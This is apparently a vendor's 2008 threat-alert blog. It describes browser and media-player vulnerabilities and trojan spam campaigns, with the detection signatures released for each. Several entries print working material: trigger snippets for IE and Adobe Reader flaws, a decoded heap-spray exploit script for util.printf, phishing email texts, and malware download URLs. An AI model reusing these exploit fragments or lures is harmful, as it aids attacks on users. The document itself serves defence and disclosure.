Posts

Microsoft IE 0-Day vulnerability (Dec 11,2008)

SonicWALL UTM Research team observed exploits circulating in the wild targeting the new zero-day vulnerability in Microsoft Internet Explorer from December 9th, 2008. It has been confirmed that some existing viruses such as IESlice.FO can be downloaded by the published exploits. The vulnerability is identified as CVE-2008-4844. The vendor also released an advisory 961051 for it.

The actual vulnerability exists in the Dynamic Link Library mshtml.dll of Microsoft Internet Explorer application. The flaw is due to an error in a module that is handling specially crafted XML data. A memory corruption will occur while Microsoft Internet Explorer handles the nested tags which contain identical XML reference in their datasrc attributes. For example, the nested XML reference can be like the following:

< span datasrc=#I datafld=B dataformatas=HTML> < span datasrc=#I datafld=B dataformatas=HTML>

If the vulnerability is triggered, the attacker can change the execution flow of the application to the code injected into the heap memory, which may cause the virus download or even full compromise of the target machine.

SonicWALL UTM Research team has analyzed the published exploits, and the following network snippet is from one of the exploits:

screenshot

Note that Internet Explorer 7 by default restricts the malicious code from being executed as seen below, but it is a general warning message that is seen even while executing legitimate code:

screenshot

SonicWALL UTM provided proactive protection against some of these vulnerability exploits with the following signatures:

  • IPS: 4665 Javascript Code Injection Attempt (Win/Linux) 2
  • GAV: IESlice.FO (Exploit)

Additional signatures specific for this vulnerability were added on December 10, 2008:

  • IPS: 3670 MS IE XML SPAN Tag Heap Overflow Attempt
  • IPS: 3671 MS IE XML SPAN Tag Heap Overflow Attempt 2
  • GAV: XMLHttpd.U (Exploit)
  • GAV: XMLHttp (Exploit)

VLC Player TY Buffer Overflow (Dec 05, 2008)

The VLC Media Player is an open source, multiplatform multimedia player. The player is capable of processing multiple audio and video formats such as MPEG, MP3, and Wave as well as streaming media. Among the supported file formats is the TiVo TY file format. The TiVo TY file format specification is proprietary and as such, not available publicly. This file format is known to consist of a generic header and media specific chunks which contain data. The header of TY files can be represented as follows:

 Offset Size Value/Description ------ --   ----------- 0x0000 4    0xF5467ABD 0x0004 4    0x00000002 0x0008 4    0x00020000 0x000C 4    ? 0x0010 4    ? 0x0014 4    bitmask size [...]

A stack buffer overflow vulnerability has been found in the VLC Media Player. The vulnerability occurs when processing TY media files. The vulnerable code does not properly validate the value at offset 0x0014 in the file header. This value is read from the file, incremented by 8 and used as a counter in a memory copy operation without any bounds checks. The destination to which file data is copied is a 32 byte stack buffer. Thus, a value larger than 32 will cause the copy operation to overrun the stack buffer. This will lead to critical data being overwritten and may consequently change the flow of execution.

This vulnerability, when exploited by enticing a user to open a malicious TV file, may result in process flow diversion. Exploits targeting this vulnerability are publicly available. SonicWALL has developed an IPS signature which will detect and block generic attack attempts. The following signature addresses this issue:

  • 1265 – VideoLAN VLC Media Player TY Processing BO Attempt

Merry Christmas Spam – Banker Trojan (Dec 02, 2008)

SonicWALL UTM Research team observed a new spam campaign starting today Tuesday, December 02, 2008 which involves a fake e-mail pretending to be arriving from either Coca-Cola, McDonalds, or Hallmark. The email has a zip archived attachment which contains the new Banker Trojan.

The e-mail looks like following:

Attachment:

  • postcard.zip (contains postcard.doc .scr)
  • promotion.zip (contains coupon.exe)
  • coupon.zip (contains coupon.exe)

Subject:

  • You’ve received A Hallmark E-Card!
  • Coca Cola is proud to accounce our new Christmas Promotion.
  • Mcdonalds wishes you Merry Christmas!

Email Body:
————————
Dear Holder

Hello!

You have recieved a Hallmark E-Card from your friend. To see it, check the attachment.
There’s something special about that E-Card feeling. We invite you to make a friend’s day and send one.

Hope to see you soon, Your friends at Hallmark

Your privacy is our priority. Click the “Privacy and Security” link at the bottom of this E-mail to view our policy.
Hallmark.com | Privacy & Security | Customer Service | Store Locator
————————

The content of the Coca-Cola and McDonald’s spam email is fetched from Coca-Cola and McDonald’s official websites.

The Trojan when executed performs following host level activity:

  • Creates qnx.exe in the Windows System directory and runs it
  • Creates vxworks.exe in the Windows System directory and runs it
  • Deletes the original copy of the file

It creates the following Registry key:

  • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWind River Systems = “[Windows System Dir]vxworks.exe”
  • HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerWallpaper
  • HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerWallpaperXMAS

vxworks.exe process listens on TCP ports 1056 and 1071 and also sends following GET request:

  • http://whatismyip.com/automation/n09230945.asp

The Trojan is also known as Trojan-Banker.Win32.Banker.abbi [Kaspersky], VirTool:Win32/CeeInject.gen!J [Microsoft], and TR/Dropper.Gen [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Banker.ABBI (Trojan) signature.

Firefox XUL Frame Tree Vulnerability (Nov 26, 2008)

The multi-platform Mozilla Firefox browser is capable of interpreting and rendering many types of content published on the Internet. Some of the widely used formats are HTML, XML,and XUL.

XUL (XML User Interface Language) is an XML (Extensible Markup Language) user interface markup language. The XUL standard draws on other existing standards like DOM, XML, and CSS, and is similar in structure to HTML.

XUL has many predefined element types such as label, command, tree, etc. The tree element holds a set of rows of elements. An example of the use of the tree element follows:

                                                     

Most XUL elements are at least partially implemented using XBL (XML Binding Language). XBL is a language used to describe bindings that can be attached to elements in other documents.

A vulnerability exists in Mozilla Firefox in the way the XBL Event Handler handles XUL documents with a series of specially crafted tree children. The flaw exists in constructing a tree frame. If the value of the rows attribute of a tree element is negative, it will mistakenly trigger an unrelated event which will remove the treechildren frame node from the DOM tree. Subsequently, the deleted frame is referenced again by the calling function which results in a NULL pointer reference. Consequently, the browser process will be terminated.
It is reported that memory corruption may occur as a result of exploitation which may lead to process flow diversion.

SonicWALL has released an IPS signature that will detect and block a specific exploit known to have been circulated in the wild. The following signature addresses this issue:

  • 5321 – Mozilla Firefox XUL Frame Tree Memory Corruption PoC

Bank of America Spam Trojan (Nov 25, 2008)

SonicWALL UTM Research team observed a new Bank of America phishing campaign starting today Tuesday, November 25, 2008. The email pretends to be a service advertisement from Bank of America and contains a URL that leads to the demo video.

SonicWALL has received more than 1,000 e-mail copies of this phishing campaign today. The e-mail looks like following:

Subject:

  • Bank of America – Demo Account
  • Bank of America – Demo Account Setup
  • Bank of America – Always Free Customer Service Demo Account, Try for FREE
  • Bank of America – full access privileges for your DEMO account

Email body:

screenshot

The URL in the e-mail points to a phishing page containing Bank of America image. The image has the Bank of America Logo and displays the bank’s URL in the status bar when the user points at it. It also shows the video screen with a play button.

screenshot

Upon user’s click or after waiting for a few seconds the page will prompt the user to download the latest version of Adobe Flash Player 9 [Filename – Adobe_Player9.exe].

screenshot

The file that gets downloaded is a new Trojan downloader variant.

screenshot

The Trojan when executed tries to connect to silviocash.com domain and downloads a new Trojan [Filename – usp.exe] via HTTP.

At the time of writing this Alert, there was very low AntiVirus detection rate for both malware executables.

SonicWALL Gateway AntiVirus provides protection against these malware executables via GAV: Bofam (Trojan) and GAV: Bofam_2 (Trojan) signatures.

Opera Browser File URI Buffer Overflow (Nov 20, 2008)

Opera is a web browser similar to Microsoft Internet Explorer and Mozilla Firefox. It is capable of displaying web pages and executing web applications. It can also interpret and render many types of Internet content, including various versions of HTML, XML, CSS (Cascade Style Sheet), JavaScript, various graphic formats and so on. Opera is made available for Windows, Macintosh, Unix and Linux based platforms.

Uniform Resource Identifier scheme (URI) is a very common naming structure that can be parsed by Opera. An example of an URI is http://www.sonicwall.com. These URIs can be embedded into any HTML web page to link to the other web pages.

There is a buffer overflow vulnerability in Opera Web browser. The vulnerability occurs when the browser tries to parse a very long URI starts with file://. The string may overwrite a fixed sized heap-based buffer and corrupt the memory, or even lead the execution of the injected code.

SonicWALL UTM team has developed a signature to block any attack addressing this issue, which is listed as bellow:

  • 3641 Opera Browser File URI Handling BO Attempt

There are also some existing signatures that can detect most of the suspicious shell codes in a web page, which are listed as bellow. They will largely eliminate the possibility of the attacks that try to inject and execute shell code by exploiting this vulnerability.

  • 3124 Javascript Code Injection Attempt (Win/Linux)
  • 3127 Javascript Code Injection Attempt (Mac)
  • 4096 Mozilla Firefox Wrapped JavaScript Code Execution
  • 4665 Javascript Code Injection Attempt (Win/Linux) 2
  • 4701 Javascript Code Injection Attempt (Win/Linux) 3
  • 4744 Javascript Code Injection Attempt (Win/Linux) 4
  • 4760 Unicode Javascript Code Injection Attempt 1
  • 4761 Unicode Javascript Code Injection Attempt 2
  • 5051 Javascript Code Injection Attempt (Win/Linux) 5

There will be another article summarizes these JavaScript Code Injection signatures soon.

UPS Invoice Spam (Nov 21, 2008)

SonicWALL UTM Research team observed a new wave of the on-going UPS invoice spam campaign starting Thursday, November 20, 2008. The email has a zip archived attachment which contains the new ZBot Trojan variant.

SonicWALL has received more than 1,000 e-mail copies of this malware till date. The e-mail looks like following:

Attachment: UPSInfo.zip (contains UPSInfo.exe)

Subject: Your Tracking # [12-digit number]

Email Body:
————————
Sorry, we were not able to deliver postal package you sent on November the 1st in time because the recipient?s address is not correct.

Please print out the invoice copy attached and collect the package at our office. If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS
————————

The executable file inside the zip attachment has an icon disguised as a Adobe PDF file and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a directory twain_32 in C:Documents and SettingsLocalServiceApplication Data and C:WINDOWSsystem32
  • Drops a copy of itself as C:WINDOWSsystem32twext.exe
  • Creates two files C:WINDOWSsystem32twain_32local.ds and C:WINDOWSsystem32twain_32user.ds

It modifies the following Registry key for running twext.exe:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32twext.exe,”

It also tries connect and download an encrypted configuration file from the following URL:

  • pavelmoous.ru/pavel/conf.bin

The Trojan is also known as Trojan-Spy.Win32.Zbot.gsv [Kaspersky], W32/Trojan3.LA [F-Prot], and TR/Spy.ZBot.gsv [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GSV (Trojan) signature.

Airline Ticket Spam (Nov 14, 2008)

SonicWALL UTM Research team observed a new spam campaign starting on Thursday, November 13, 2008 which involves a fake e-mail pretending to be arriving from an Airline Company and containing Airline Ticket. The email has a zip archived attachment which contains the new Downloader Trojan.

The e-mail looks like following:

Attachment: ticket.zip (contains ticket.doc .exe)

Subject:

  • Your flight ticket
  • Your ticket from Delta Airlines
  • Your ticket from Alaska Airlines
  • Your ticket from United Airlines
  • Your airplane ticket

Email Body:
————————
Dear Holder

Thank you for using our new service “Buy flight ticket Online” on our website. Your account has been created:

Your login: your-email-address
Your password: random-string

Your credit card has been charged for $WXX.YY (where W=4 and X,Y = 0-9)
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
Airline Name (E.g. United, Alaska etc)
————————

The executable file inside the zip attachment has an icon disguised as a Microsoft Word document and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a dirctory as C:Program FilesMicrosoft Common
  • Drops a copy of itself as C:Program FilesMicrosoft Commonwuauclt.exe
  • Deletes the original copy of the file
  • Creates multiple .sys files in SYSTEM32DRIVERS directory
  • Creates multiple .tmp files which later gets deleted

It creates the following Registry key for itself:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exeDebugger: “C:Program FilesMicrosoft Commonwuauclt.exe”

It also tries connect and download files from the following URLs:

  • furely.ru/load2/ld.php?v=[REMOVED]168650&n=1&uid=1 [Downloads msan1.exe – detected as GAV: Wigon.HE (Trojan)]
  • kexlup.ru/loadx/ld.php?v=[REMOVED]75168650&n=1&uid=1 [connection failed]

The Trojan is also known as Trojan.Win32.Agent.amzt [Kaspersky], W32/Trojan3.JD [F-Prot], and TR/Dldr.iBill.BP [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.AMZT (Trojan) signature [8,344 hits recorded].

MS08-069 MS XML Core Vulnerability (Nov 12, 2008)

Microsoft has released an advisory for its XML processing framework during this month’s Microsoft Patch Day. It is named MSXML or Microsoft XML Core services. The framework may be used by developers in third party applications as well as applications shipped with the operating system. The most popular application using this framework is Internet Explorer, which can transform XML files using XSL stylesheets.

The XML Core Services package contains the DOMDocument ActiveX object which represents the top level of the XML source. Document Type Definition (DTD) is one of several SGML and XML schema languages that DOMDocument can parse. DOMDocument includes members for retrieving and creating all other XML objects. One of those member methods, loadXML, can load an XML document using the supplied string. The supplied string can contain external DTD, which resides in a separate document and is referred by the URI of the DTD file.

An information disclosure vulnerability exists in the DOMDocument ActiveX object control implementation. The flaw is due to a design weakness in the way XML core service handles error checks for external DTDs. Normally, one domain cannot access other different domains for information. However, the vulnerable versions of MSXML allow parameter entities in external DTDs to reference data on a different domain. A successful exploitation would disclose cross-domain potential confidential information to the attacker.

To protect SonicWALL customers from being attacked by any attacks addressing this vulnerability, the SonicWALL UTM team has created and released the following IPS signatures at the same day as the advisory was released.

  • 1210 MS XML Core Services parseError Info Disclosure Attempt 2 (MS08-069)
  • 1209 MS XML Core Services parseError Info Disclosure Attempt 1 (MS08-069)

Adobe Reader util.printf Buffer Overflow (Nov 7, 2008)

Adobe Reader (formerly Acrobat Reader) is a ubiquitous application for viewing PDF (Portable Document Format) documents.

Since version 4.0, Acrobat includes JavaScript functionality allowing for customization and extensibility. Acrobat JavaScript is an extension of the core JavaScript which adds Acrobat-specific classes that enable the author to manage document related tasks. These classes include app, dbg, console, SOAP, ADBC, util, etc.

The util object provides the printf method which takes as argument, a format string specifier and values to be formatted; then it returns the corresponding formatted string. For example:

   var num = 12345
   util.printf(“%.2f”, num)

We get 12345.00.

There exists a stack buffer overflow in Adobe Reader when parsing specially crafted PDF files. Specifically, the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the “util.printf()” JavaScript function. If the format string contains specific width for a floating point number, the code will copy the padding spaces (0x20) to a stack-allocated buffer with fixed length. Supplying an overly large width will overflow the buffer with spaces and overwrite SEH. For Example:

   var num = 1.2
   util.printf(“%5000f”, num)

This causes the byte 0x20 to be copied 5000 times on the stack and overflows the buffer.

An attacker can exploit this vulnerability by enticing a user to open a PDF document, which contains a malformed floating point specifier in the “util.printf()” JavaScript function. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

To evade the detection of the attack an attacker might use obfuscate techniques. For example, one of the PDF files exploiting this vulnerability contains the following FlateDecode stream:

x48x89xACx57x6Dx8Bx14x31x0CxFEx2ExF8x27x0Ex06xEE
x10x64xB6x69xD3x19xFCxE4xEEx9ExFFx43x8Ex05x05xF1
xC4x53x7FxBFx4DxFAx96xA4x5DxCFx13x61x76xE8xA6xE9
xD3xE4xC9x4Bx3Bx97x5Fx1FxBFxDCxFExFCx7Ax79x7AxF8
xF8xEDx72x7Bx73xF3xE6x66x49xBFx88x0Bx1Ex78xE0x16
[…truncated]
xE3xC3xEDx8FxEFx3Fx2Fx77xEFx7Ex0Bx30x00xDAxDAxDC
xBB

Which would be decoded as:

function main() {

var sccs = unescape(“%u03eb%ueb59%ue805%ufff8[…truncated]“);

var bgbl = unescape(“%u0A0A%u0A0A”);
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length – slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk; var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs } var nm = 12;
for(i = 0; i < 18; i++){ nm = nm + "9"; }
for(i = 0; i < 276; i++){ nm = nm + "8"; } util.printf(“%45000f”, nm); this.closeDoc(true);
}

app.setTimeOut(“main()”, 5000);

SonicWALL Gateway AntiVirus provides protection against this vulnerability via GAV: PDF.util.printf.AS (Exploit) and PDF.util.printf.AS_2 (Exploit) signatures.